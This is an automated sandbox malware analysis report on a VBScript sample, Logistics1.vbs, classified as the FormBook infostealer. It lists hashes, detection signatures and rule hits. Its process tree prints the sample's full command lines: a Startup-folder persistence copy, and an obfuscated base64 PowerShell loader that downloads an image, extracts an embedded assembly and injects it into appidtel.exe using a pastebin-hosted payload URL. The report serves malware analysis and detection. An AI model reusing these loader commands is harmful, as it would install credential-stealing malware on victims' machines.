Edit tour
Windows
Analysis Report
Logistics1.vbs
Overview
General Information
| Sample name: | Logistics1.vbs |
| Analysis ID: | 1530595 |
| MD5: | 932031ace12970e0b4ebbf866caebf8d |
| SHA1: | 83c48bf1a066adf5c8a32cb14187af5697778b5c |
| SHA256: | 5fd68faf4d253cd50d2598eba5fe49f80899ba8c0fc613763a790f6132ecf071 |
| Tags: | vbsuser-abuse_ch |
| Infos: |   |
 | |
Detection
FormBook
| Score: | 100 |
| Range: | 0 - 100 |
| Whitelisted: | false |
| Confidence: | 100% |
Signatures
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Suricata IDS alerts for network traffic
VBScript performs obfuscated calls to suspicious functions
Yara detected FormBook
Yara detected Powershell download and execute
AI detected suspicious sample
Bypasses PowerShell execution policy
Connects to a pastebin service (likely for C&C)
Found suspicious powershell code related to unpacking or dynamic code loading
Injects a PE file into a foreign processes
Obfuscated command line found
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: HackTool - CrackMapExec PowerShell Obfuscation
Sigma detected: Potential PowerShell Command Line Obfuscation
Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: PowerShell Base64 Encoded Invoke Keyword
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Uses ping.exe to check the status of other devices and networks
Uses ping.exe to sleep
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Suspicious PowerShell Invocations - Specific - ProcessCreation
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match
Classification
- System is w10x64
wscript.exe (PID: 7540 cmdline: C:\Windows \System32\ WScript.ex e "C:\User s\user\Des ktop\Logis tics1.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80) 
cmd.exe (PID: 7632 cmdline: "C:\Window s\System32 \cmd.exe" /c ping 12 7.0.0.1 -n 10 & powe rshell -co mmand [Sys tem.IO.Fil e]::Copy(' C:\Windows \system32\ Logistics1 .vbs', 'C: \Users\' + [Environm ent]::User Name + ''\ AppData\Ro aming\Micr osoft\Wind ows\Start Menu\Progr ams\Startu p\ sbv.etn arugif.vbs ')') MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 7640 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) 
PING.EXE (PID: 7680 cmdline: ping 127.0 .0.1 -n 10 MD5: 2F46799D79D22AC72C241EC0322B011D) 
powershell.exe (PID: 7792 cmdline: powershell -command [System.IO .File]::Co py('C:\Win dows\syste m32\Logist ics1.vbs', 'C:\Users \' + [Envi ronment]:: UserName + ''\AppDat a\Roaming\ Microsoft\ Windows\St art Menu\P rograms\St artup\ sbv .etnarugif .vbs')') MD5: 04029E121A0CFA5991749937DD22A1D9) - powershell.exe (PID: 7892 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -command $ Codigo = ' KCgnezF9aW 1hZ2VVcmwg PSAnKyd7MC crJ31odHRw czovL2lhNj AwMTAyLnVz LmFyY2hpdm Uub3JnLzMy L2l0ZW1zL2 RldGFoLW5v dGUtdl8nKy cyMDI0MTAv RGV0YWhOb3 RlX1YuanBn IHswfTt7MX 13ZWJDbGll bnQgPSAnKy dOZXctT2Jq ZWN0IFN5c3 RlbS5OZXQu V2ViQ2xpZW 50O3sxfWlt YWdlQnl0ZX MgPSB7MX13 ZWJDbGllbn QuRG93bmxv YWREYXRhKH sxfWltYWdl VXInKydsKT t7MX1pbWFn ZVRleHQgPS BbU3lzdGVt LlRleHQuRW 5jb2Rpbmcn KyddOjpVVE Y4LkdldFN0 cmluZygnKy d7MX1pbWFn ZUJ5dGVzKT snKyd7MX1z dGFydEZsYW cnKycgPSB7 MH08JysnPE JBU0U2NF9T VEEnKydSVD 4+ezAnKyd9 O3sxfWVuZE ZsYWcgPSB7 MH08PEJBU0 U2NF9FTkQ+ PnsnKycwfT t7MX1zdCcr J2FydEluZG V4ID0gezF9 aW1hZ2VUZX h0LkluZGV4 T2YoezF9c3 RhcnRGbGFn KTt7MX1lbm RJbmRleCA9 ICcrJ3sxfW ltYWdlVGV4 dC5JbmRleE 9mKHsxfScr J2VuZEZsYW cpO3sxfXN0 YXJ0SW5kZX ggLWdlIDAg LWFuZCB7MX 1lbmRJbmRl eCAtZ3Qgez F9c3RhcnRJ bmRleDt7MX 1zdGFydElu ZGV4ICs9IH sxfXN0YXJ0 RmxhZy5MZW 5ndGg7ezF9 YmFzZTY0TG VuZ3RoID0g ezF9ZW5kSW 5kZXggLSB7 MX1zJysndG FydEluZGV4 O3sxfScrJ2 JhJysncycr J2U2NENvbW 0nKydhbmQg PSB7MX1pbW FnZVRleHQu UycrJ3Vic3 RyaW5nKHsx fXN0YXJ0SW 5kZXgsIHsx fWJhc2U2NE xlbmd0aCk7 ezF9Y29tbW FuZEJ5dCcr J2VzJysnID 0gW1N5c3Rl bS5Db252ZX J0XTo6RnJv bUJhc2U2NF N0cmluZyh7 MX1iYXNlNj RDb21tYW5k KTt7MX1sb2 FkZWRBc3Nl bWJseSA9IF tTeXN0ZW0u UmVmbCcrJ2 VjdGlvbi5B c3NlbWInKy dseV06Okxv YWQoezF9Y2 9tbWFuZEJ5 dGVzKTt7MX 12YWlNZXRo b2QgPSBbZG 5saWIuSU8u SG9tZV0uR2 V0TWV0aG9k KHswfVZBSX swfScrJyk7 ezF9dmFpTW V0aG9kLklu dm9rZSh7MX 1udScrJ2xs LCBAKHswfT AvMkdmMkEv ZC9lZS5ldH NhcC8vOnNw dHRoezB9LC B7MH1kZXNh dGl2YWRvez B9LCB7MH1k ZXNhdGl2YW RvezB9LCB7 MCcrJ31kZS crJ3NhdGl2 YWRvezB9LC B7MH1kZXNh dGl2YWRvez B9LCB7MH0x ezB9LCB7MH 1hcHBpZHRl bHswfSkpOy cpIC1mW0NI QVJdMzksW0 NIQVJdMzYp fC4oIChbc3 RyaU5nXSR2 ZVJCb3NlUH JFZkVyZW5j RSlbMSwzXS sneCctSm9p TicnKQ=='; $OWjuxd = [system.Te xt.encodin g]::UTF8.G etString([ system.Con vert]::Fro mbase64Str ing($codig o));powers hell.exe - windowstyl e hidden - executionp olicy bypa ss -NoProf ile -comma nd $OWjuxD MD5: 04029E121A0CFA5991749937DD22A1D9) - conhost.exe (PID: 7900 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - powershell.exe (PID: 8004 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -windowsty le hidden -execution policy byp ass -NoPro file -comm and "(('{1 }imageUrl = '+'{0'+' }https://i a600102.us .archive.o rg/32/item s/detah-no te-v_'+'20 2410/Detah Note_V.jpg {0};{1}we bClient = '+'New-Obj ect System .Net.WebCl ient;{1}im ageBytes = {1}webCli ent.Downlo adData({1} imageUr'+' l);{1}imag eText = [S ystem.Text .Encoding' +']::UTF8. GetString( '+'{1}imag eBytes);'+ '{1}startF lag'+' = { 0}<'+'<BAS E64_STA'+' RT>>{0'+'} ;{1}endFla g = {0}<<B ASE64_END> >{'+'0};{1 }st'+'artI ndex = {1} imageText. IndexOf({1 }startFlag );{1}endIn dex = '+'{ 1}imageTex t.IndexOf( {1}'+'endF lag);{1}st artIndex - ge 0 -and {1}endInde x -gt {1}s tartIndex; {1}startIn dex += {1} startFlag. Length;{1} base64Leng th = {1}en dIndex - { 1}s'+'tart Index;{1}' +'ba'+'s'+ 'e64Comm'+ 'and = {1} imageText. S'+'ubstri ng({1}star tIndex, {1 }base64Len gth);{1}co mmandByt'+ 'es'+' = [ System.Con vert]::Fro mBase64Str ing({1}bas e64Command );{1}loade dAssembly = [System. Refl'+'ect ion.Assemb '+'ly]::Lo ad({1}comm andBytes); {1}vaiMeth od = [dnli b.IO.Home] .GetMethod ({0}VAI{0} '+');{1}va iMethod.In voke({1}nu '+'ll, @({ 0}0/2Gf2A/ d/ee.etsap //:sptth{0 }, {0}desa tivado{0}, {0}desati vado{0}, { 0'+'}de'+' sativado{0 }, {0}desa tivado{0}, {0}1{0}, {0}appidte l{0}));') -f[CHAR]39 ,[CHAR]36) |.( ([stri Ng]$veRBos ePrEfErenc E)[1,3]+'x '-JoiN'')" MD5: 04029E121A0CFA5991749937DD22A1D9) - appidtel.exe (PID: 5484 cmdline:
"C:\Window s\SysWOW64 \appidtel. exe" MD5: 2C04FB942B2735073D75063E9FFBF50C) - appidtel.exe (PID: 7224 cmdline:
"C:\Window s\SysWOW64 \appidtel. exe" MD5: 2C04FB942B2735073D75063E9FFBF50C)
- cleanup
⊘No configs have been found
| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security | ||
| Windows_Trojan_Formbook_1112e116 | unknown | unknown |
| |
| JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security | ||
| Windows_Trojan_Formbook_1112e116 | unknown | unknown |
| |
| INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC | Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | ditekSHen |
| |
| Click to see the 2 entries | ||||
| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security | ||
| Windows_Trojan_Formbook_1112e116 | unknown | unknown |
| |
| JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security | ||
| Windows_Trojan_Formbook_1112e116 | unknown | unknown |
|
| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security |
System Summary |   |
|---|
| Source: | Author: Florian Roth (Nextron Systems): | ||